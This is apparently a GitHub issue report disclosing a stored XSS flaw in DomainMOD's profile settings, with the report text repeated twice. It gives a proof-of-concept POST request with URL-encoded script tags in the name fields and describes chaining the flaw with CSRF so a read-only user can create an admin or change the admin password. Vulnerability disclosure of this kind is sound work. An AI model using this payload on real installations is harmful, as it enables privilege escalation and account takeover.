There are two Stored XSS vulnerability.
read-only user use the add the Stored XSS and CSRF can add administrator account or change the read-only user to admin or change admin password……
poc:
after read-only user login
post url https://demo.domainmod.org/settings/profile/
post data:new_first_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E&new_last_name=test%22%3E%3Cscript%3Ealert%28%2F2222%2F%29%3C%2Fscript%3E&new_email_address=test%40test.com&new_currency=USD&new_timezone=Canada%2FPacific&new_expiration_emails=0
then the admin login ,open the url https://demo.domainmod.org/admin/users/. the javascript will execution. with CSRF vulnerability(#65) , a read-only user can add administrator account or change the read-only user to admin or change admin password……
The text was updated successfully, but these errors were encountered:
There are two Stored XSS vulnerability.
read-only user use the add the Stored XSS and CSRF can add administrator account or change the read-only user to admin or change admin password……
poc:
after read-only user login
post url
https://demo.domainmod.org/settings/profile/post data:
new_first_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E&new_last_name=test%22%3E%3Cscript%3Ealert%28%2F2222%2F%29%3C%2Fscript%3E&new_email_address=test%40test.com&new_currency=USD&new_timezone=Canada%2FPacific&new_expiration_emails=0then the admin login ,open the url https://demo.domainmod.org/admin/users/. the javascript will execution. with CSRF vulnerability(#65) , a read-only user can add administrator account or change the read-only user to admin or change admin password……
The text was updated successfully, but these errors were encountered: